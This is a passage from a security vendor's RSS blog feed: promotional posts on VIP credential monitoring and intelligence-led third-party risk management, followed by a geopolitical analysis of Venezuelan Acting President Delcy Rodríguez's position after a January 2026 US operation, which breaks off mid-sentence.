        <p>The gap between when credentials are stolen and when a security team finds out is where breaches happen. Recorded Future closes that gap.</p>
        <p>When a VIP credential appears in exposure data, teams can initiate a password reset, review active sessions, or reach out directly to the individual — all before the credential is exploited. For identities that carry this level of organizational risk, getting ahead of the exposure isn't just operationally valuable; it can be the difference between a resolved alert and a significant incident.</p>
        <h2>A Complete Picture of Identity Exposure</h2>
        <p>VIP Credential Monitoring is built on the same intelligence infrastructure that powers Recorded Future <a href="https://www.recordedfuture.com/ko/products/identity-intelligence">Identity Intelligence</a> broadly: the same source coverage, the same detection engine, the same alert and triage workflow. It applies that capability to a category of identities that warrant closer attention, without requiring a separate tool, process, or integration. That's the logic behind Identity Intelligence as a whole: a unified view of credential exposure across every category of identity your organization needs to protect, covering employees, customers, and your highest-risk individuals.</p>
        <p>For teams already using Identity Intelligence to monitor employee and customer credentials, VIP Monitoring is a targeted extension of coverage that fits into what they've already built. Any VIP credentials identified will benefit from the same core features of Identity Intelligence.</p>
        <p>This includes Incident Reports, which surfaces any other credentials that may have been compromised from the same machine, and Customizable Alerting, which streamlines prioritization of these detections and can trigger response workflows through existing integrations with Okta, Microsoft Entra ID, XSOAR, Splunk, and others.</p>
        <p>Attackers don't limit their targets to one type of account, and your monitoring shouldn't either. To see where you stand today, request a free <a href="https://pages.recordedfutureext.com/IdentityExposureReport_LandingPage.html">Identity Exposure Assessment Report</a> and get a concrete, evidence-based picture of your organization's credential exposure over the past year. Contact us to learn more about how Recorded Future can help your organization protect its identities and to see a demo of the platform in action.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_189c2081486ef4c5b4333dd74730e898e793786a9.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Third-Party Risk Is an Intelligence Operation. It's Time We Treated It Like One.]]></title>
            <link>https://www.recordedfuture.com/ko/blog/recorded-future-sees-its-inclusion-in-the-2026-forrester-wave</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/recorded-future-sees-its-inclusion-in-the-2026-forrester-wave</guid>
            <pubDate>Thu, 09 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future sees its inclusion in the 2026 Forrester Wave™ for Cybersecurity Risk Ratings Platforms as a reflection of a broader truth: the era of ratings-only vendor risk management is over.]]></description>
            <content:encoded><![CDATA[
        <p>For years, the cybersecurity industry has treated third-party risk management as a compliance exercise. Assess your vendors. Assign a score. File the report. Move on. That model was built for a different era. One where supply chains were smaller, threat actors were less sophisticated, and a quarterly questionnaire could reasonably approximate a vendor's security posture. That era is over.</p>
        <p>Today, the average enterprise works with hundreds of third parties. Threat actors actively target the weakest links across those supply chains, not because the vendors themselves are the prize, but because they're the path of least resistance into larger, more valuable targets.</p>
        <p>Ransomware groups list vendors on extortion sites before those vendors even know they've been compromised. Stolen employee credentials surface on dark web forums undetected. Critical vulnerabilities are weaponized in hours, not months. In this environment, a security rating is necessary. But it is nowhere near sufficient.</p>
        <h2>Recognized in the 2026 Forrester Wave™</h2>
        <p>Recorded Future was recently included in The Forrester Wave™: Cybersecurity Risk Ratings Platforms, Q2 2026. (The report is available online to <a href="https://www.forrester.com/report/RES192714">Forrester customers or for purchase</a> <a href="https://www.forrester.com/report/RES192714">here</a>).</p>
        <p>We see this recognition as a reflection of the market's evolution — and as an acknowledgement of the direction we've been building toward.</p>
        <p>We believe the cybersecurity risk ratings market is at an inflection point. Analysts and practitioners alike recognize that the category is moving beyond standalone ratings toward integrated intelligence and actionable insights. We see our inclusion in this evaluation as confirmation that the convergence of hygiene data and threat intelligence isn't a niche play — it's where the market is heading. In light of where the ratings market is today, let’s dive into where Recorded Future is going and how Recorded Future envisions the future of securing the third-party ecosystem.</p>
        <h2>The Gap Between Hygiene and Intelligence</h2>
        <p>Cyber risk ratings have earned their place in the security stack. They provide a standardized, scalable way to evaluate a vendor's external security posture — patching cadence, encryption practices, DNS configuration, exposed services. That hygiene baseline matters. It's a correlative signal for breach potential, and it gives risk teams a common language for comparing vendors and benchmarking against industry peers.</p>
        <p>But hygiene ratings only answer part of the problem: <em>How well is this vendor maintaining their defenses?</em></p>
        <p>They don't tell you whether anyone is actively trying to breach those defenses. They don't surface the dark web chatter on a specific vendor. They don't alert you when a vendor's credentials are leaked or has an active malware infection. This is the gap that has left third-party risk programs perpetually reactive. Teams learn about vendor compromises from news headlines or from the vendors themselves — often days or weeks after the initial breach. By then, the window for proactive response may have closed.</p>
        <p>From our own customer conversations, we hear that security and risk teams have shifted from wanting ratings and accuracy alone to demanding intelligence that reveals real cybersecurity risk, with prioritized findings and actionable remediation guidance. Ratings are increasingly commoditized. The differentiation now lies in what you do with the data, and what additional signals you bring to the table.</p>
        <h2>Third-Party Risk Management Is an Intelligence Operation</h2>
        <p>If you accept that ratings alone aren't enough, the logical next step is clear: third-party risk management must be treated as an intelligence operation.</p>
        <p>That means combining the hygiene baseline — the outside-in view of a vendor's security posture — with real-time threat intelligence that tells you who is being targeted, how, and what you should do about it. It means shifting from periodic assessments to continuous monitoring. It means equipping risk teams with the context to distinguish between a low-priority configuration issue and a vendor whose infrastructure is actively under attack. This is the problem <a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Recorded Future Third-Party Risk</a> was built to solve.</p>
        <p>We've brought together two distinct capabilities that, until now, existed in separate worlds.</p>
        <ol>
          <li><a href="https://www.riskrecon.com/">RiskRecon</a> — built over a decade as one of the industry's leading cyber risk ratings platforms, trusted by 21,500+ users across 30+ industries, provides the hygiene foundation: transparent, evidence-backed security ratings evaluated across 40+ criteria in 9 security domains, with 99% audited data accuracy.</li>
          <li><a href="https://www.recordedfuture.com/ko/platform">Recorded Future's threat intelligence capabilities</a>, powered by collection and analysis across more than 1 million sources, adds the threat dimension: real-time alerting on ransomware extortion activity, dark web exposures, credential leaks, and active vulnerability exploitation — often before the affected vendor is even aware.</li>
        </ol>
        <p>Together, these capabilities create something the market hasn't had before: <strong>a single solution that covers the full lifecycle of third-party risk, from initial assessment and onboarding through continuous monitoring and incident response</strong>.</p>
        <h2>What This Looks Like in Practice</h2>
        <p>The value of combining hygiene ratings with threat intelligence isn't theoretical. Our customers are already seeing it play out.</p>
        <ul>
          <li>When a vendor appears on a ransomware extortion site, Third-Party Risk customers can receive alerts in hours — not the days or weeks it takes for vendor self-disclosure.</li>
          <li>When credentials associated with a monitored vendor surface on dark web markets, risk teams can initiate outreach and remediation before those credentials are weaponized.</li>
          <li>When a critical vulnerability is disclosed, intelligence context helps analysts determine which vendors are actually exposed and at risk of exploitation, rather than treating every vendor with the affected software as equally urgent.</li>
        </ul>
        <p>Customers consistently report a roughly 33% increase in visibility into third-party risks after adopting the platform (<a href="https://app.userevidence.com/assets/5382HRMQ">UserEvidence</a>). Teams save an average of 7 hours per week that was previously spent on manual research and monitoring (<a href="https://app.userevidence.com/assets/6884WZGT">UserEvidence</a>). And customers routinely detect vendor incidents before the vendor itself has disclosed — turning what used to be a reactive scramble into a controlled, proactive response.</p>
        <p>These aren't incremental improvements. They represent a fundamental shift from reactive compliance to proactive risk management.</p>
        <h2>Where We're Going</h2>
        <p>We're not done. Bringing RiskRecon and Recorded Future together was the first step in a broader vision for what third-party risk management should become.</p>
        <p>Our roadmap is focused on deepening the integration between these two platforms into a unified experience. One where hygiene ratings, threat intelligence, and risk workflows operate seamlessly together. We're investing in AI-driven capabilities that will help risk analysts cut through noise faster, automate routine assessment workflows, and surface the insights that matter most. And we're building toward predictive intelligence that doesn't just tell you what's happening now, but helps you anticipate where risk is headed.</p>
        <p>The goal is straightforward: make third-party risk management as data-driven, automated, and intelligence-led as the best security operations programs already are.</p>
        <h2>Join the Shift to Intelligence-Driven Third-Party Risk</h2>
        <p>Third-party risk programs that rely exclusively on hygiene ratings will continue to be caught off guard. The vendors who score well on a Tuesday can be breached by Wednesday. The questionnaire response you received last quarter may not reflect today's reality.</p>
        <p>The organizations that are getting ahead of this are the ones treating third-party risk as what it actually is: an intelligence operation that requires continuous monitoring, real-time alerting, and the context to act decisively when something changes.</p>
        <p>That's the future we're building. And we believe we're the only ones building it with the depth of intelligence and the strength of ratings data required to get it right.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_100e70f38b09c3ffd0d78368f1b1fb6b9fab24f95.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Understanding and Anticipating Venezuelan Government Actions]]></title>
            <link>https://www.recordedfuture.com/ko/research/understanding-and-anticipating-venezuelan-government-actions</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/understanding-and-anticipating-venezuelan-government-actions</guid>
            <pubDate>Wed, 08 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore an in-depth analysis of Venezuela’s political landscape following the January 2026 US operation to capture Nicolás Maduro. This executive summary examines Acting President Delcy Rodríguez’s transition strategy, her pragmatic re-engagement with Washington, and the internal threats posed by PSUV rivals like Diosdado Cabello. Gain insights into the "three-phase" US plan for stabilization, the 2026 Organic Hydrocarbons Law reforms, and the outlook for economic recovery versus the existential threat of competitive elections. Essential intelligence for organizations monitoring Latin American geopolitical risk and energy sector investments.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Venezuelan Acting President Delcy Rodríguezʼs policy decisions will affect economic and political stability in Venezuela in the coming months. Her approach will likely be shaped by a deep familiarity with the state security apparatus, her revolutionary identity, a demonstrated willingness to break from orthodoxy and seek coordination with Washington, an interest in restoring support for the ruling United Socialist Party of Venezuela PSUV, and a long memory for perceived slights. These principles, paired with changing local power dynamics after the January 3, 2026, United States US special operation to capture former Venezuelan President Nicolás Maduro and his wife, Cilia Flores, suggest Rodríguez is very likely to prioritize near-term governability and economic stabilization over maximalist ideological positioning. At the same time, she will likely find ways to cooperate with the US in ways designed to preserve the rule of PSUV and her credibility with other members of the ruling coalition. Rodríguezʼs core objectives are very likely to preserve PSUV rule and resist an opposition-led transfer of power, while maximizing the economic benefits of reengagement with Washington, including sanctions relief, investment, and a possible economic recovery. This will likely contribute to Rodríguez governing in a manner that avoids high-risk moves that could fracture her coalition or trigger instability that undermines her utility to the White House. In this approach, the biggest internal threat she faces in the short term is very likely PSUV rivals, including Interior Minister Diosdado Cabello, and other military and economic elites who perceive US engagement as a direct threat to their interests. While it is impossible to predict every move the Venezuelan government may take, public and private organizations can better anticipate risks to stability and investments — such as resistance to US-supported reforms or evidence of internal divisions in the regime — by systematically monitoring the rhetoric and actions of Delcy Rodríguez, Diosdado Cabello, and other senior officials using the Recorded Future® Intelligence Operations Platform</p>
        <h2>Key Findings</h2>
        <ul>
          <li>The January 3, 2026, US operation provoked panic among Venezuelan elites and fueled deep uncertainty regarding the plan to succeed Maduro, which was only resolved when US signaling prompted Venezuelan institutions to confirm that Rodríguez would assume presidential duties.</li>
          <li>Rodríguezʼs hold on power is threatened internally by rival PSUV figures, chief among them Interior Minister Diosdado Cabello and his network of allies across Venezuelaʼs security apparatus and among pro-government armed groups.</li>
          <li>Externally, the main threats to Rodríguezʼs power stem from US leverage over Caracas, including US geopolitical aims to bring Venezuela further under Washingtonʼs influence as well as US officialsʼ stated pursuit of a transition and support for the opposition faction led by María Corina Machado.</li>
          <li>To avoid a destabilizing rupture that could trigger US backlash, Delcy Rodríguez will very likely prioritize internal governability and economic stabilization, cooperating with Washington enough to see sustained sanctions relief while seeking to manage rather than expel hardline rivals from her coalition.</li>
          <li>To preserve her own credibility and influence in Venezuela, Rodríguez is likely to pair compliance with Washingtonʼs demands with “face-savingˮ gestures that assert Venezuelan sovereignty, and to resist genuinely competitive elections unless economic gains materially improve the PSUVʼs electoral odds.</li>
        </ul>
        <h2>Assessing Current Dynamics in Venezuela</h2>
        <p>Over the past 25 years, US-Venezuela relations have worsened as Venezuela’s government actively sought to oppose US interests in the Western Hemisphere, deepened relations with US rivals around the globe, and became increasingly authoritarian. This began under the deceased former president Hugo Chávez, whose movement, known as “Chavismo,” has governed the country since 1999. After Nicolás Maduro took power in Venezuela following Chávez’s death in 2013, he accelerated the consolidation of power and the erosion of democratic institutions begun by his predecessor. The US <u></u><a href="https://www.atlanticcouncil.org/commentary/trackers-and-data-visualizations/who-is-the-international-community-sanctioning-in-venezuela/">responded</a> by imposing financial and oil sanctions meant to limit Venezuela’s ability to profit from its vast oil reserves and sanctioning over 200 members of the Venezuelan elite. The US pressure campaign on Venezuela accelerated in late 2025 under President Donald Trump, who deployed a historic number of naval assets to the Caribbean.</p>
        <p>This military campaign culminated at around 02:00 Venezuelan Standard Time (VET) on January 3, 2026, when US special forces carried out airstrikes and a surgical intervention into Venezuela as part of an operation to capture and extract Maduro and his wife, Cilia Flores, to face drug trafficking and terrorism charges in New York. These events were the most significant US military operation in Latin America since the 1989 invasion of Panama, and ratified a new US doctrine that emphasizes primacy and willingness to use all available tools (economic, diplomatic, and military) to advance US interests in the Western Hemisphere, as <a href="https://www.whitehouse.gov/wp-content/uploads/2025/12/2025-National-Security-Strategy.pdf">laid</a> out in the 2025 National Security Strategy. In Venezuela, the events of January 3 precipitated the most impactful shakeup of the country’s political order in decades.</p>
        <p>While Acting President Delcy Rodríguez has <u></u><a href="https://cnnespanol.cnn.com/2026/02/26/venezuela/video/delcy-rodriguez-amigo-socio-donald-trump-sanciones">signaled</a> an openness to working with US priorities, this cooperation is affected by active tensions among the ruling elite and longstanding mistrust between Washington and Caracas. Understanding the events of January 3, 2026, and the immediate aftermath is crucial to evaluating the state of play on the ground and in the bilateral relationship.</p>
        <h2>Uncertainty in the Immediate Aftermath of the US Operation</h2>
        <p>In the immediate aftermath of the January 3 operation, there was widespread uncertainty in Venezuela regarding the future of PSUV rule. While the constitutional line of succession makes clear that the vice president should assume power in the president’s absence, initial messages from Venezuelan officials emphasized solidarity with Maduro and Flores rather than offering clarity on the future of PSUV governance. There was no official public reaction to the operation from the Venezuelan government until 04:14 VET, when former Defense Minister Vladimir Padrino López published a video on social media condemning the attack. He stated that Venezuela’s military — the Bolivarian Armed Forces (FANB) — was declaring a national emergency and deploying at strategic points around the country and <a href="https://www.facebook.com/PadrinoVladimir/videos/pueblo-heroico-de-venezuela-soldados-de-la-patria-hijos-e-hijas-de-bol%C3%ADvar-la-fu/692139637164231/">called</a> for unity against “imperialist threats.” Statements from Venezuelan officials since then confirmed the raid but did not clarify the makeup of the Venezuelan government.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1efba2db35f8d6829c5783b4a88eb7415755e9a6a.png?width=750&amp;format=png&amp;optimize=medium" width="686" height="386" />
            </div>
          </div>
          <div>
            <div>
              <p><em><strong>Figure 1:</strong></em> <em>Venezuelan state TV broadcast showing Rodríguez presiding over a meeting of the</em></p>
              <p><em>Council of National Defense (Source:</em> <em><a href="https://www.youtube.com/watch?v=Z3E0uWN88Gk">Telesur</a>)</em></p>
            </div>
          </div>
        </div>
        <p>The first clarity on Venezuela’s future leadership came from Washington. At roughly 11:50 EST (12:50 VET), US president Donald Trump gave a public address in which he explicitly <a href="https://www.youtube.com/watch?v=SsdkClL2_bg">stated</a> that Washington would work with Rodríguez as it assumed a more direct role in overseeing the country’s energy and security policies. Trump also said that María Corina Machado, the most popular opposition figure in the country (who had been outside the country since December 2025 and is currently in Washington) did not “have the support within or the respect within the country” to rule. While Trump claimed that Rodríguez had been "sworn in," Rodríguez’s hold on power was not publicly ratified until 15:20 VET. At that time, state television <a href="https://www.youtube.com/watch?v=p4V7Qiu7NrQ">aired</a> footage of the Council of National Defense, a body made up of the main institutional leaders of the country, featuring Rodríguez chairing the meeting and Cabello, López, and National Assembly President Jorge Rodríguez (Delcy Rodríguez’s brother) present. It was not until roughly 22:00 VET that state media began circulating a <a href="https://historico.tsj.gob.ve/decisiones/scon/enero/352131-0001-3126-2026-26-0001.HTML">decision</a> from the Constitutional Chamber of the Venezuelan Supreme Tribunal of Justice (TSJ) that made clear that Rodríguez would assume the duties of the president. In its ruling, the TSJ invoked a Chávez-era precedent to overrule constitutional language that would otherwise require her to schedule an early election, effectively indicating that Rodríguez is very likely seeking a mandate until Maduro’s term ends in January 2031. Neither Rodríguez nor any other official has yet made this claim explicit, and US officials have <a href="https://www.politico.com/news/2026/02/06/white-house-frustrations-with-venezuelas-machado-surface-after-election-comments-00770005">suggested</a> that new elections should be held before then. On January 5, she was officially sworn into office in a televised ceremony held in the National Assembly in the presence of key figures in the regime and diplomats from China, Iran, Russia, and Cuba.</p>
        <h2>US-Venezuela Relations Since January 3</h2>
        <p>Since January 3, the US has generally signaled support for a working relationship with Delcy Rodríguez, while making clear that Washington expects full cooperation with its energy and security priorities. In the immediate aftermath of the operation, President Trump told reporters that he might <a href="https://www.reuters.com/world/us/venezuelas-maduro-custody-trump-says-us-will-run-country-2026-01-04">consider</a> a second strike if Rodríguez did not cooperate, but then, on January 9, <a href="https://truthsocial.com/@realDonaldTrump/posts/115864395969123502">announced</a> on Truth Social that he had “cancelled the previously expected second Wave of Attacks” in response to the Venezuelan government releasing a number of political prisoners. Since this announcement, Trump has <a href="https://www.reuters.com/world/americas/trump-venezuelan-leader-Rodr%C3%ADguez-tout-positive-phone-call-2026-01-14/">sought</a> to 1 convey that he and Rodríguez work closely together. On March 5, 2026, Trump <a href="https://truthsocial.com/@realDonaldTrump/posts/116172714486213504">posted</a> on social media that Rodríguez is “doing a great job, and working with US Representatives very well.”</p>
        <p>US Secretary of State Marco Rubio has also expressed a willingness to work with Rodríguez’s interim government, but provided more explicit emphasis on a transition as the ultimate end goal of US policy. Speaking to reporters on January 7, Rubio <a href="https://www.reuters.com/world/us/rubio-says-us-plan-venezuela-is-stability-recovery-then-transition-2026-01-07/">described</a> the US approach as consisting of three main phases: stabilization, recovery, and transition. Stabilization, he stated, is needed to prevent Venezuela from “descending into chaos,” which would be avoided by US control over oil-sale proceeds. Rubio clarified that the “recovery” phase would be aimed at reopening the oil sector to US and other Western firms, and it would ultimately be followed by a “process of transition” that would include reconciliation among Venezuelans. This three-phase framing has been echoed by other US officials, although to date, no fixed timeframe for a transition has been made public. US officials have also <a href="https://www.nytimes.com/2026/01/16/us/politics/cia-director-ratcliffe-venezuela.html">said</a> that severing Venezuela’s ties to Russia, China, Cuba, and other US geopolitical adversaries is a top priority in the relationship.</p>
        <p>US-Venezuela coordination on energy policy appears to be advancing rapidly. On January 29, Venezuela’s PSUV-controlled National Assembly <a href="https://www.asambleanacional.gob.ve/noticias/an-sanciona-reforma-de-ley-organica-de-hidrocarburos">passed</a> a reform to the country’s Organic Hydrocarbons Law, aimed at increasing autonomy for private companies involved in the country’s oil and gas industry. While the revised law continues to assert state ownership over hydrocarbon reserves, it broadens the mechanisms through which private companies can participate in upstream activity, including allowing private operators — via contracts with state-owned energy company Petróleos de Venezuela S.A. (PDVSA) or joint ventures — to assume operational control while retaining a share of production. The reform also introduces a much more flexible framework for royalties and taxes, which can be set on a case-by-case basis by the Ministry of Energy, with royalties of up to 30% and taxes of up to 15%. Previous windfall taxes have been eliminated in this reform.</p>
        <p>US support for revitalized energy cooperation with Venezuela has been enthusiastic, and President Trump has actively <a href="https://www.youtube.com/watch?v=l6u3H4hKgjA">encouraged</a> US and other Western oil companies to invest as much as $100 billion in Venezuela. Two days after the passage of the Organic Hydrocarbons Law reforms, the US <a href="https://www.cnn.com/2026/01/31/politics/us-envoy-venezuela-arrival">sent</a> Chargé d’Affaires Laura Dogu, who leads the Venezuela Affairs Unit out of the US Embassy in Colombia, to Caracas, where she is tasked with overseeing the restoration of diplomatic ties with Venezuela. While Dogu has conveyed US support for closer relations, she has reiterated US support for an eventual transition. On February 2, she met with Rodríguez, and afterward <a href="https://x.com/usembassyve/status/2018460485709095330">posted</a> on X that in the meeting she reiterated “the three phases that Secretary Rubio has outlined for Venezuela: stabilization, economic recovery and reconciliation, and transition.”</p>
        <p>In the wake of the Organic Hydrocarbons Law reform, the US Treasury Department’s Office of Foreign Assets Control (OFAC) <a href="https://ofac.treasury.gov/sanctions-programs-and-country-information/venezuela-related-sanctions">issued</a> a series of general licenses allowing US and other Western companies to produce, refine, transport, and sell oil without seeking individual exemptions, effectively lifting sanctions that had previously restricted these activities (see <strong>Appendix A)</strong>. These OFAC licenses mandate that any authorized transactions with Venezuela's government or state energy company PDVSA must follow US laws (with disputes being resolved in the US), and that payments to the Venezuelan government or any other Venezuelan sanctioned entity be made into a US-overseen fund. US support for energy investment in Venezuela was emphasized from February 11 to 12, when US Energy Secretary Chris Wright led a delegation to Caracas to meet with Rodríguez, becoming the highest-ranking US official to visit Venezuela in years.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ad1dc22918718a39396ba9124959a30421f70065.png?width=750&amp;format=png&amp;optimize=medium" width="1170" height="728" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>US Energy Secretary Chris Wright examining crude oil at a PDVSA project site with Rodríguez (Source:</em> <em><a href="https://x.com/SecretaryWright/status/2022781983118500275/photo/1">Social Media</a>)</em></div>
          </div>
        </div>
        <h2>Internal and External Threats Confronting Acting President Rodríguez</h2>
        <p>Since Acting President Rodríguez took over from Maduro in the immediate aftermath of the US operation on January 3, she has voiced support for cooperation with Washington — but her incentives to cooperate fully are very likely limited. Rodríguez is aware of Washington’s “three point plan” for Venezuela and is likely supportive of US plans to stabilize the country, lift sanctions, and promote investment. However, she is almost certainly seeking to preserve her rule and a government led by the PSUV, and will very likely resist any attempt to preside over a transition of power to an opposition-led government. Her ability to do so will very likely depend on her ability to consolidate power and manage potential spoilers within her own coalition, as well as her ability to deepen cooperation with US interests and demonstrate utility to the White House. In doing so, she faces a number of internal and external threats to her rule, which include challenges by rivals inside the ruling PSUV over the next six to twelve months, and pressure by Washington to hold new elections over the next twelve to twenty-four months.</p>
        <h3>Internal Threats to Rodríguez’s Rule</h3>
        <p>The main internal threat to Rodríguez’s power in the short term is other members of the ruling elite. She has steadily worked to consolidate power and secure the support of the military and intelligence services, but her support among the country’s political and economic sectors is far from settled. There are almost certainly key figures in the security forces, the business community, and in the ruling party who view Rodríguez, and her relationship with the US, as a challenge to the previous status quo and its associated privileges, economic arrangements, and patronage schemes. They may be concerned about their future influence, immunity</p>
        <p>As Rodríguez continues to establish her rule, some of these individuals may seek to oppose her, either by seeking to derail or sabotage her rapprochement with Washington or by openly rebelling against her. In this context, an attempted palace coup cannot be ruled out. Her primary rivals include the following figures and networks, each of whom has a distinct power base and incentive to view Rodríguez as an adversary or rival:</p>
        <ul>
          <li><strong>Diosdado Cabello, Minister of Interior, Justice and Peace.</strong> Cabello is a senior power broker within the ruling party and has been the PSUV’s Secretary General since 2011. He has deep <a href="https://insightcrime.org/es/noticias/papel-colectivos-lucha-poder-venezuela-salida-maduro/">connections</a> to the security services and hardline enforcement networks, including to pro-government armed paramilitary organizations known as “colectivos” (see <strong>Figure 3</strong>). State media has <a href="https://www.elfinanciero.com.mx/mundo/2026/01/28/el-chavismo-se-cuadra-vladimir-padrino-y-diosdado-cabello-juran-lealtad-a-delcy-rodriguez/">sought</a> to downplay reported tensions between Cabello and Rodríguez, but Cabello’s incentives to undermine her are straightforward: Her consolidation of power threatens his influence over the party, the security apparatus, and his networks. He is also the only current cabinet member who was <a href="https://www.justice.gov/opa/media/1422326/dl">named</a> in the unsealed drug trafficking indictment US prosecutors issued to capture Maduro, and he likely suspects that Rodríguez may eventually hand him over to the US.</li>
          <li><strong>General Vladimir Padrino López, former Minister of Defense</strong>. Padrino’s Lopez’s likely core incentive is to preserve the influence he accumulated after over a decade as the institutional head of the FANB, and to preserve the patronage networks he developed as the country’s longest-serving defense minister. He also likely seeks to protect himself and senior officers loyal to him from eventual prosecution for corrupt activities or involvement in repression, and therefore very likely views Rodríguez’s government as a challenge to longstanding FANB impunity. While there is no public evidence of any cracks between Padrino López and Rodríguez, it is very likely that he will resist meaningful reforms inside the armed forces</li>
          <li><strong>Major General Alexis Rodríguez Cabello, Director of the Servicio Bolivariano de Inteligencia Nacional (SEBIN)</strong>. Cabello is a cousin of Diosdado Cabello and is believed to be close to him. As head of the primary intelligence service, Rodríguez Cabello has strong incentives to resist reforms that would expose him or his network to prosecution, and to preempt any purge that might impact him or his network.</li>
          <li><strong>Major General Iván Rafael Hernández Dala, former director of the General Directorate of Military Counterintelligence (DGCIM)</strong>. Hernández Dala, a close confidant of Maduro, was head of DGCIM until replaced by Rodríguez in January 2026. He is also believed to be a longstanding opponent of both Rodríguez and Cabello, and of their respective factions in the PSUV. Even if sidelined from formal command, Hernández Dala likely retains networks inside the intelligence and security apparatus. He likely has incentives to undermine Rodríguez if he anticipates facing prosecution for past abuses, loss of status, or exclusion from any protection or economic deals between Washington and Caracas.</li>
          <li><strong>Business and Political Elites Tied to Maduro</strong>. Maduro and Flores dominated Venezuelan politics for nearly thirteen years. During that time, they cultivated a vast network of well-connected economic, military, and political elites that helped them sustain power. Many of them are not overtly tied to the Rodríguez siblings, and instead may be willing to ally themselves with rival factions to advance their own interests. Possible figures in this category include:
            <ul>
              <li><strong>Tarek William Saab, Acting Ombudsman</strong>. Until his resignation in February 2026, Saab served as attorney general since 2017 and held significant influence over how the repressive apparatus was deployed, overseeing detentions and prisoner releases. Saab’s resignation was very likely forced, and he has clear incentives to resist any reform process that reduces his discretion or creates a credible path to independent investigations into past repression or corruption.</li>
              <li><strong>Nicolas Maduro Guerra, also known as “Nicolasito</strong>.” A member of the National Assembly and son of Maduro and Flores, Maduro Guerra is not one of the top PSUV powerbrokers in his own right but has played a crucial role in securing continuity by appearing publicly with Rodríguez and <a href="https://cnnespanol.cnn.com/2026/02/12/venezuela/hijo-maduro-padre-pasos-correctos-unidad-orix">claiming</a> she has his parents’ full support. Given lingering questions over internal Chavista involvement in the January 3 operation, he has leverage to complicate Rodríguez’s narrative and may seek to use it if he feels that his interests are threatened by the Rodríguez administration.</li>
              <li><strong>Alex Saab</strong>. Saab <a href="https://ofac.treasury.gov/media/43236/download?inline">played</a> a crucial role in facilitating sanctions evasion networks until his arrest by US law enforcement in 2020. Saab was later returned to Venezuela in a 2023 prisoner swap, and Maduro rewarded him by making him Minister of Industry and National Production. Rodríguez replaced him in January 2026, likely understanding that Saab was not palatable for US business interests, but Saab likely retains enough social capital within Venezuela’s private sector to pose a challenge to Rodríguez. This is the likely reason why Saab was reportedly <a href="https://www.nytimes.com/2026/02/04/world/americas/venezuela-said-to-detain-maduro-allies-targeted-by-the-us.html">detained</a> by Venezuelan intelligence in February 2026, although his lawyer has maintained that he is not under arrest.</li>
            </ul>
          </li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_16b6465db49374e12b6530f2c980c6d73129cc6b8.png?width=750&amp;format=png&amp;optimize=medium" width="1542" height="1600" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Illustration of key internal rivals of Venezuelan Acting President Delcy Rodríguez (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>External Threats to Rodríguez’s Rule</h2>
        <h3>US Pressure to Box Out Geopolitical Adversaries</h3>
        <p>In the short term, the most significant external threat that Rodríguez faces is a reversal of United States policy — either via renewed military or intelligence operations intended to force her removal, or through a more indirect pressure campaign meant to trigger a domestic fracture. A second US special forces operation to depose her outright is unlikely, but it remains a scenario Rodríguez and her circle will have to treat seriously, given the direct and disproportionate leverage that Washington currently holds over Caracas. More likely than further military action is the prospect of renewed pressure: the US can calibrate sanctions relief, revoke OFAC licences, and facilitate or block diplomatic recognition in ways that shape incentives and perceptions of the regime’s survivability among Venezuelan elites. Recent reporting <a href="https://www.reuters.com/world/china/us-intelligence-raises-doubts-about-venezuela-leaders-cooperation-2026-01-28/">suggests</a> Washington is simultaneously pursuing deepened energy engagement while remaining skeptical about whether Rodríguez will fully align with US strategic demands, which increases the possibility of an abrupt shift away from Rodríguez if she does not deliver on US priorities.</p>
        <p>A major fault line in the US-Venezuela relationship is Venezuela’s ongoing relationships with US geopolitical adversaries, namely China, Russia, Iran, and Cuba, even as the US has increasingly sought to box them out of Venezuela. US officials publicly <a href="https://www.cbsnews.com/news/marco-rubio-secretary-of-state-face-the-nation-transcript-01-04-2026/">demanded</a> that Venezuela cut ties with adversary nations and have actively moved to push them out. The US has successfully pressured Venezuela to end fuel shipments to Cuba, and OFAC general licenses intended to facilitate Venezuelan oil and gas activity explicitly do not authorize transactions involving Russian, Chinese, or Iranian entities. In spite of this, Rodríguez has sought to publicly <a href="https://en.mehrnews.com/news/240521/Venezuela-interim-pres-receives-Iran-China-Russia-envoys">demonstrate</a> an interest in retaining these partnerships.</p>
        <h3>Opposition Efforts to Limit US-Venezuela Engagement</h3>
        <p>Another short-term external threat to Rodríguez is opposition figure María Corina Machado. While she remains the most popular opposition figure in Venezuela, and her faction has a <a href="https://www.bbc.com/news/articles/cyv3vlz01g3o">demonstrated</a> capacity to organize protests on the ground, these have so far not presented a significant threat to stability or to PSUV governance. Her presence in Washington since December 2025, however, has provided her with a major platform to directly shape the US foreign policy debate over Venezuela. With Machado and close advisors operating from Washington, she has <a href="https://www.politico.com/news/2026/02/06/white-house-frustrations-with-venezuelas-machado-surface-after-election-comments-00770005">advanced</a> a narrative publicly supportive of the US agenda while privately calling on allies in Congress and in the international community to <a href="https://www.nytimes.com/2026/01/20/us/politics/house-foreign-affairs-machado-venezuela.html">press</a> for a clearer timetable for new elections and the ouster of the PSUV. She has also used her platform to <a href="https://www.nbcnews.com/world/latin-america/corina-macado-returning-venezuela-opposition-rcna261278">promise</a> she will return soon, and to highlight perceived inconsistencies between Rodríguez’s actions and her rhetoric, 